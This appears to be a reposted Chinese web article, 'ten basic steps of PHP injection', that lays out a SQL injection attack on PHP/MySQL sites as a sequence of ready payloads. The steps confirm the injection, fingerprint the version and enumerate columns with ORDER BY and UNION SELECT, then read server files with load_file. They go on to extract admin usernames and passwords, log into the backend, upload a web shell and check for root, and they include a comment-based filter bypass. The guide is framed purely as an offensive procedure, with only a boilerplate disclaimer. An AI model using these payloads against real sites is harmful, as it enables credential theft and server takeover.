| php注入十點基本步驟 1、判斷是否存在注入,加'、and 1=1、and 1=2 2、判斷版本and ord(mid(version(),1,1))>51/* 返回正常說明是4.0以上版本,可以用union查詢 3、利用order by 暴字段,在網址后加 order by 10/* 如果返回正常說明字段大于10 4、再利用union來查詢準確字段,如: and 1=2 union select 1,2,3,......./* 直到返回正常報出數字,說明猜到準確字段數。如過濾了空格可以用/**/代替。 (可在分別用user()、database()、version()進行替換報出的數字進而查看信息) 5、判斷數據庫連接帳號有沒有寫權限,and (select count(*) from mysql.user)>0/* 如果結果返回錯誤,那我們只能猜解管理員帳號和密碼了。 6、如果返回正常,則可以通過and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路徑的ascii值,用逗號隔開)),8,9,10 /* 注:load_file(char(文件路徑的ascii值,用逗號隔開))也可以用十六進制,通過這種方式讀取配置文件,找到數據庫連接等。 7、首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6....from user/* 如果返回正常,說明存在這個表。 8、知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6....from user/* 按報出的數字進行替換 9、同理再猜解password字段,猜解成功再找后臺登錄。 10、登錄后臺,上傳shell。 11、檢測是不是root權限 and/**/ord(mid(user(),1,1))=114/* |
免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!
始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!
掃一掃,關注站長網微信
大家都在看
